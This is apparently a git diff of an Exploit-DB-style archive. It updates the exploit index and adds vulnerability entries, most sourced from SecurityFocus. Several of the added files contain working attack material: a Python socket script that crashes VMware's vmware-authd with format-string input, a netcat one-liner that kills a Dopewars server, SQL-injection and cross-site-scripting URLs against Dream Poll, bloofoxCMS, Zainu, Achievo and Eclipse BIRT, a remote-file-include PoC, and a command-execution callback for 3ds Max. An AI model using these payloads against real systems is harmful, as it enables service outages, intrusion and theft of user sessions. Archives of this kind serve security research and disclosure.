diff --git a/files.csv b/files.csv
index 425edb007..267e5f4a5 100755
--- a/files.csv
+++ b/files.csv
@@ -2767,7 +2767,7 @@ id,file,description,date,author,platform,type,port
3093,platforms/php/webapps/3093.txt,"AllMyGuests <= 0.3.0 (AMG_serverpath) Remote Inclusion Vulnerabilities",2007-01-07,beks,php,webapps,0
3094,platforms/bsd/local/3094.c,"OpenBSD 3.x - 4.0 vga_ioctl() Local Root Exploit",2007-01-07,"Critical Security",bsd,local,0
3095,platforms/php/webapps/3095.py,"Wordpress 2.0.5 Trackback UTF-7 Remote SQL Injection Exploit",2007-01-07,"Stefan Esser",php,webapps,0
-3096,platforms/php/webapps/3096.txt,"AllMyLinks <= 0.5.0 (index.php) Remote File Include Vulnerability",2007-01-07,GoLd_M,php,webapps,0
+3096,platforms/php/webapps/3096.txt,"AllMyLinks <= 0.5.0 - (index.php) Remote File Include Vulnerability",2007-01-07,GoLd_M,php,webapps,0
3097,platforms/php/webapps/3097.txt,"AllMyVisitors 0.4.0 (index.php) Remote File Inclusion Vulnerability",2007-01-07,bd0rk,php,webapps,0
3098,platforms/osx/dos/3098.html,"OmniWeb 5.5.1 Javascript alert() Remote Format String PoC",2007-01-07,MoAB,osx,dos,0
3099,platforms/linux/remote/3099.pm,"Berlios GPSD <= 2.7 - Remote Format String Exploit (meta)",2007-01-08,Enseirb,linux,remote,2947
@@ -20890,7 +20890,7 @@ id,file,description,date,author,platform,type,port
23696,platforms/asp/webapps/23696.pl,"ASP Portal Multiple Vulnerabilities",2004-02-01,"Manuel Lopez",asp,webapps,0
23697,platforms/php/webapps/23697.txt,"AllMyGuests 0.x info.inc.php Arbitrary Code Execution",2004-02-16,"Pablo Santana",php,webapps,0
23698,platforms/php/webapps/23698.txt,"AllMyVisitors 0.x info.inc.php Arbitrary Code Execution",2004-02-16,"Pablo Santana",php,webapps,0
-23699,platforms/php/webapps/23699.txt,"AllMyLinks 0.x footer.inc.php Arbitrary Code Execution",2004-02-16,"Pablo Santana",php,webapps,0
+23699,platforms/php/webapps/23699.txt,"AllMyLinks 0.x - footer.inc.php Arbitrary Code Execution",2004-02-16,"Pablo Santana",php,webapps,0
23700,platforms/windows/remote/23700.txt,"ACLogic CesarFTP 0.99 Remote Resource Exhaustion Vulnerability",2004-02-16,"intuit e.b.",windows,remote,0
23701,platforms/windows/dos/23701.txt,"XLight FTP Server 1.52 Remote Send File Request Denial of Service Vulnerability",2004-02-16,"intuit e.b.",windows,dos,0
23702,platforms/asp/webapps/23702.txt,"ProductCart 1.x/2.x Weak Cryptography",2004-02-16,"Nick Gudov",asp,webapps,0
@@ -29991,3 +29991,16 @@ id,file,description,date,author,platform,type,port
33265,platforms/hardware/remote/33265.js,"Palm WebOS 1.0/1.1 Email Arbitrary Script Injection Vulnerability",2009-10-05,"Townsend Ladd Harris",hardware,remote,0
33266,platforms/php/webapps/33266.txt,"Joomla! CB Resume Builder 'group_id' Parameter SQL Injection Vulnerability",2009-10-05,kaMtiEz,php,webapps,0
33267,platforms/php/webapps/33267.txt,"X-Cart Email Subscription 'email' Parameter Cross Site Scripting Vulnerability",2009-10-06,"Paulo Santos",php,webapps,0
+33268,platforms/asp/webapps/33268.html,"AfterLogic WebMail Pro 4.7.10 Multiple Cross Site Scripting Vulnerabilities",2009-10-06,"Sébastien Duquette",asp,webapps,0
+33269,platforms/linux/dos/33269.txt,"Dopewars Server 1.5.12 'REQUESTJET' Message Remote Denial of Service Vulnerability",2009-10-15,"Doug Prostko",linux,dos,0
+33270,platforms/windows/remote/33270.txt,"Microsoft Internet Explorer 5.0.1 'deflate' HTTP Content Encoding Remote Code Execution Vulnerability",2009-10-13,Skylined,windows,remote,0
+33271,platforms/windows/dos/33271.py,"VMware Player and Workstation <= 6.5.3 'vmware-authd' Remote Denial of Service Vulnerability",2009-10-07,shinnai,windows,dos,0
+33272,platforms/windows/remote/33272.txt,"Autodesk 3ds Max Application Callbacks Arbitrary Command Execution Vulnerability",2009-10-23,"Sebastian Tello",windows,remote,0
+33273,platforms/windows/remote/33273.scn,"Autodesk Softimage 7.0 Scene TOC File Remote Code Execution Vulnerability",2009-11-23,"Diego Juarez",windows,remote,0
+33280,platforms/hardware/dos/33280.txt,"Palm WebOS 1.0/1.1 'LunaSysMgr' Service Denial of Service Vulnerability",2009-10-13,"Townsend Ladd Harris",hardware,dos,0
+33281,platforms/php/webapps/33281.txt,"Achievo 1.x Multiple Cross Site Scripting and HTML Injection Vulnerabilities",2009-10-13,"Ryan Dewhurst",php,webapps,0
+33282,platforms/php/webapps/33282.txt,"Dream Poll 3.1 'index.php' Cross-Site Scripting and SQL Injection Vulnerabilities",2009-10-13,infosecstuff,php,webapps,0
+33284,platforms/multiple/webapps/33284.txt,"Pentaho BI 1.x Multiple Cross Site Scripting and Information Disclosure Vulnerabilities",2009-10-14,euronymous,multiple,webapps,0
+33286,platforms/java/webapps/33286.txt,"Eclipse BIRT 2.2.1 'run?__report' Parameter Cross Site Scripting Vulnerability",2009-10-14,"Michele Orru",java,webapps,0
+33287,platforms/php/webapps/33287.txt,"bloofoxCMS 0.3.5 'search' Parameter Cross Site Scripting Vulnerability",2009-10-15,"drunken danish rednecks",php,webapps,0
+33288,platforms/php/webapps/33288.txt,"Zainu 1.0 'searchSongKeyword' Parameter Cross Site Scripting Vulnerability",2009-10-14,"drunken danish rednecks",php,webapps,0
diff --git a/platforms/asp/webapps/33268.html b/platforms/asp/webapps/33268.html
new file mode 100755
index 000000000..0a68d2d8a
--- /dev/null
+++ b/platforms/asp/webapps/33268.html
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/36605/info
+
+AfterLogic WebMail Pro is prone to multiple cross-site scripting vulnerabilities because the application fails to sufficiently sanitize user-supplied data.
+
+Attacker-supplied HTML or JavaScript code could run in the context of the affected site, potentially allowing the attacker to steal cookie-based authentication credentials; other attacks are also possible.
+
+AfterLogic WebMail Pro 4.7.10 and prior versions are affected.
+
+
\ No newline at end of file
diff --git a/platforms/hardware/dos/33280.txt b/platforms/hardware/dos/33280.txt
new file mode 100755
index 000000000..11c70821c
--- /dev/null
+++ b/platforms/hardware/dos/33280.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/36659/info
+
+Palm WebOS is prone to a remote denial-of-service vulnerability because it fails to properly validate user-supplied data.
+
+Attackers can leverage this issue to cause an affected device to reboot. Given the nature of this issue, attackers may also be able to run arbitrary code, but this has not been confirmed.
+
+Palm WebOS 1.1 is vulnerable; other versions may also be affected.
+
+AAAAA... using 50280 or more characters after the refresh.
\ No newline at end of file
diff --git a/platforms/java/webapps/33286.txt b/platforms/java/webapps/33286.txt
new file mode 100755
index 000000000..1660254b8
--- /dev/null
+++ b/platforms/java/webapps/33286.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/36674/info
+
+Eclipse BIRT (Business Intelligence and Reporting Tools) is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
+
+Eclipse BIRT 2.2.1 is vulnerable; other versions may also be affected.
+
+http://www.example.com/birt-viewer/run?__report='">&r=-703171660
\ No newline at end of file
diff --git a/platforms/linux/dos/33269.txt b/platforms/linux/dos/33269.txt
new file mode 100755
index 000000000..1b28a5f18
--- /dev/null
+++ b/platforms/linux/dos/33269.txt
@@ -0,0 +1,11 @@
+source: http://www.securityfocus.com/bid/36606/info
+
+Dopewars is prone to a denial-of-service vulnerability that affects the server part of the application.
+
+An attacker can exploit this issue to crash the affected application, denying service to legitimate users.
+
+This issue affects Dopewars 1.5.12; other versions may also be affected.
+
+The following exploit is available:
+
+ruby -e 'print "foo^^Ar1111111\n^^Acfoo\n^AV65536\n"' | nc localhost 7902
\ No newline at end of file
diff --git a/platforms/multiple/webapps/33284.txt b/platforms/multiple/webapps/33284.txt
new file mode 100755
index 000000000..93b21826b
--- /dev/null
+++ b/platforms/multiple/webapps/33284.txt
@@ -0,0 +1,25 @@
+source: http://www.securityfocus.com/bid/36672/info
+
+Pentaho BI is prone to multiple cross-site scripting and information-disclosure vulnerabilities because it fails to properly validate user-supplied input.
+
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks. The attacker may also exploit these issues to obtain sensitive session information.
+
+Pentaho BI 1.7.0.1062 is vulnerable; other versions may also be affected.
+
+GET /pentaho/ViewAction?&
+outputType=khgj345kjh3535
+&solution=opentaps&action=CustomerLifeTimeOrders.xaction&path=Customer%20Analysis
+HTTP/1.0
+User-Agent: Opera/9.63 (Windows NT 5.1; U; en) Presto/2.1.1
+Host: demo1.opentaps.org:8181
+Accept: text/html, application/xml;q=0.9, application/xhtml+xml,
+image/png, image/jpeg,
+image/gif, image/x-xbitmap, */*;q=0.1
+Accept-Language: it-IT,it;q=0.9,en;q=0.8
+Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
+Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
+Referer: http://www.example.com:8181/pentaho/ViewAction?solution=opentaps&path=
+Customer%20Analysis&action=CustomerLifeTimeOrders.xaction
+Cookie: JSESSIONID=85740C182994F78946BE8A38605396B1
+Cookie2: $Version=1
+Proxy-Connection: Keep-Alive
diff --git a/platforms/php/webapps/3096.txt b/platforms/php/webapps/3096.txt
index 20fc791ce..cf700564b 100755
--- a/platforms/php/webapps/3096.txt
+++ b/platforms/php/webapps/3096.txt
@@ -1,26 +1,26 @@
-/###################################################################\
-# AllMyLinks 0.5.0 #
-# ========================================================= #
-# Published : 2007-01-07 #
-# Remote: Yes #
-# Site: http://download.php-resource.net/AllMyLinks/AllMyLinks0.5.0.zip
-#####################################################################
-# Author: GolD_M #
-# Contact: HackEr_@W.CN #
-# ===================================================== #
-# ThanX = All My Friends & ABDULLAH00 & MilW0rm.Com #
-# SpeciaL GreeTz : Tryag-Team & 4lKaSrGoLd3n-Team #
-\###################################################################/
-In :
-/index.php
-Line:
-/77
-Vulnerable Code:
-/include("$AML_opensite");
-3xpl!T
-/index.php?AML_opensite=[Ev!L_Scr!pT]
-/#######################################\
-# Tryag.Com & Dwrat.Com #
-\#######################################/
-
-# milw0rm.com [2007-01-07]
+/###################################################################\
+# AllMyLinks 0.5.0 #
+# ========================================================= #
+# Published : 2007-01-07 #
+# Remote: Yes #
+# Site: http://download.php-resource.net/AllMyLinks/AllMyLinks0.5.0.zip
+#####################################################################
+# Author: GolD_M #
+# Contact: HackEr_@W.CN #
+# ===================================================== #
+# ThanX = All My Friends & ABDULLAH00 & MilW0rm.Com #
+# SpeciaL GreeTz : Tryag-Team & 4lKaSrGoLd3n-Team #
+\###################################################################/
+In :
+/index.php
+Line:
+/77
+Vulnerable Code:
+/include("$AML_opensite");
+3xpl!T
+/index.php?AML_opensite=[Ev!L_Scr!pT]
+/#######################################\
+# Tryag.Com & Dwrat.Com #
+\#######################################/
+
+# milw0rm.com [2007-01-07]
diff --git a/platforms/php/webapps/33281.txt b/platforms/php/webapps/33281.txt
new file mode 100755
index 000000000..4a3d31139
--- /dev/null
+++ b/platforms/php/webapps/33281.txt
@@ -0,0 +1,12 @@
+source: http://www.securityfocus.com/bid/36661/info
+
+Achievo is prone to multiple cross-site scripting and HTML-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data.
+
+Attacker-supplied HTML or JavaScript code could run in the context of the affected site, potentially allowing the attacker to steal cookie-based authentication credentials and to control how the site is rendered to the user; other attacks are also possible.
+
+Versions prior to Achievo 1.4.0 are affected.
+
+
+
+
+http://www.example.com/dispatch.php?atkprevlevel=0&atkescape=&atknodetype=organization.contracts&atkaction=admin&atksmartsearch=clear&atkstartat=0&atksearch[contractnumber]=">&atksearchmode[contractnumber]=substring&atksearch[contractname]=">&atksearchmode[contractname]=substring&atksearch_AE_contracttype[contracttype][=&atksearchmode[contracttype]=exact&atksearch_AE_customer[customer]=">&atksearchmode[customer]=substring
diff --git a/platforms/php/webapps/33282.txt b/platforms/php/webapps/33282.txt
new file mode 100755
index 000000000..4f2bbd879
--- /dev/null
+++ b/platforms/php/webapps/33282.txt
@@ -0,0 +1,11 @@
+source: http://www.securityfocus.com/bid/36663/info
+
+Dream Poll is prone to a cross-site scripting vulnerability and multiple SQL-injection vulnerabilities.
+
+Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+Dream Poll 3.1 is vulnerable; other versions may also be affected.
+
+http://www.example.com/index.php?action=loginsortField=poll_default&sortDesc=1&recordsPerPage=1>?>alert(911)%3B
+http://www.example.com/index.php?action=loginsortField=poll_default+and+31337-31337=0&sortDesc=1&recordsPerPage=20
+http://www.example.com/index.php?action=loginsortField=poll_default+and+sleep(3)%23&sortDesc=1&recordsPerPage=20
diff --git a/platforms/php/webapps/33287.txt b/platforms/php/webapps/33287.txt
new file mode 100755
index 000000000..90ec18457
--- /dev/null
+++ b/platforms/php/webapps/33287.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/36700/info
+
+bloofoxCMS is prone to a cross-site scripting vulnerability because the application fails to sufficiently sanitize user-supplied input passed through the 'search' parameter.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
+
+This issue affects bloofoxCMS 0.3.5; other versions may be vulnerable as well.
+
+http://www.example.com/search.5.html?search=x%27%22%3E%3Cscript%3Ealert(%22redneck%22)%3C/script%3E
\ No newline at end of file
diff --git a/platforms/php/webapps/33288.txt b/platforms/php/webapps/33288.txt
new file mode 100755
index 000000000..6521b9104
--- /dev/null
+++ b/platforms/php/webapps/33288.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/36701/info
+
+Zainu is prone to a cross-site scripting vulnerability in the Contact module because the application fails to sufficiently sanitize user-supplied input.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
+
+This issue affects Zainu 1.0; other versions may be vulnerable as well.
+
+http://www.example.com/demo/index.php?view=SearchSong&searchSongKeyword=buurp%22%27%3E%3Cscript%3Ealert(%22BUUURP%21%21%22)%3C/script%3E
\ No newline at end of file
diff --git a/platforms/windows/dos/33271.py b/platforms/windows/dos/33271.py
new file mode 100755
index 000000000..1cf402192
--- /dev/null
+++ b/platforms/windows/dos/33271.py
@@ -0,0 +1,52 @@
+source: http://www.securityfocus.com/bid/36630/info
+
+VMware Player and Workstation are prone to a remote denial-of-service vulnerability because the applications fail to perform adequate validation checks on user-supplied input.
+
+An attacker can exploit this issue to crash the 'vmware-authd' process, denying service to legitimate users.
+
+NOTE: This issue was also covered in BID 39345 (VMware Hosted Products VMSA-2010-0007 Multiple Remote and Local Vulnerabilities); this BID is being retained to properly document the issue.
+
+# ----------------------------------------------------------------------------
+# VMware Authorization Service <= 2.5.3 (vmware-authd.exe) Format String DoS
+# url: http://www.vmware.com/
+#
+# author: shinnai
+# mail: shinnai[at]autistici[dot]org
+# site: http://www.shinnai.net
+#
+# This was written for educational purpose. Use it at your own risk.
+# Author will be not responsible for any damage.
+#
+# Tested on Windows XP Professional Ita SP3 full patched
+# ----------------------------------------------------------------------------
+
+# usage: C:\>exploit.py 127.0.0.1 912
+
+import socket
+import time
+import sys
+
+host = str(sys.argv[1])
+port = int(sys.argv[2])
+
+s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+
+try:
+ conn = s.connect((host, port))
+ d = s.recv(1024)
+ print "Server <- " + d
+
+ s.send('USER \x25\xFF \r\n')
+ print 'Sending command "USER" + evil string...'
+ d = s.recv(1024)
+ print "Server response <- " + d
+
+ s.send('PASS \x25\xFF \r\n')
+ print 'Sending command "PASS" + evil string...'
+ try:
+ d = s.recv(1024)
+ print "Server response <- " + d
+ except:
+ print "\nExploit completed..."
+except:
+ print "Something goes wrong honey..."
diff --git a/platforms/windows/local/29922.py b/platforms/windows/local/29922.py
index 72e300dc0..e84e24a1f 100755
--- a/platforms/windows/local/29922.py
+++ b/platforms/windows/local/29922.py
@@ -14,6 +14,9 @@
# This scripts creates a .wps file which exploits the vulnerability described in
# CVE-2013-3934 and bypasses SafeSEH protection
+## Exploit-DB Note: Python v2 only.
+
+
from struct import pack
file="exploit.wps"
diff --git a/platforms/windows/remote/33270.txt b/platforms/windows/remote/33270.txt
new file mode 100755
index 000000000..f0a4a381e
--- /dev/null
+++ b/platforms/windows/remote/33270.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/36622/info
+
+Microsoft Internet Explorer is prone to a remote code-execution vulnerability.
+
+Attackers can exploit this issue to execute arbitrary code in the context of the user running the application. Successful exploits will compromise the application and possibly the computer. Failed attacks may cause denial-of-service conditions.
+
+HTTP/.\nContent-Encoding:deflate\r\t\n\r\n\x20\x20
+
+HTTP \nContent-Encoding:deflate\nContent-Range:\n\n”
diff --git a/platforms/windows/remote/33272.txt b/platforms/windows/remote/33272.txt
new file mode 100755
index 000000000..6072d0703
--- /dev/null
+++ b/platforms/windows/remote/33272.txt
@@ -0,0 +1,14 @@
+source: http://www.securityfocus.com/bid/36634/info
+
+Autodesk 3ds Max is prone to a vulnerability that lets attackers execute arbitrary commands in the context of the vulnerable application.
+
+This issue affects the following:
+
+3ds Max 6 through 9
+3ds Max 2008 through 2010
+
+Other versions may also be vulnerable.
+
+The following proof-of-concept code is available:
+
+callbacks.addScript #filePostOpen ("DOSCommand(\"calc.exe\")") id:#mbLoadCallback persistent:true
\ No newline at end of file
diff --git a/platforms/windows/remote/33273.scn b/platforms/windows/remote/33273.scn
new file mode 100755
index 000000000..730ad3de2
--- /dev/null
+++ b/platforms/windows/remote/33273.scn
@@ -0,0 +1,31 @@
+source: http://www.securityfocus.com/bid/36637/info
+
+Autodesk Softimage is prone to a remote code-execution vulnerability.
+
+Successful exploits will allow attackers to execute arbitrary code within the context of the affected application. Failed exploit attempts will result in a denial-of-service condition.
+
+
+ JScript
+
+
+
+
+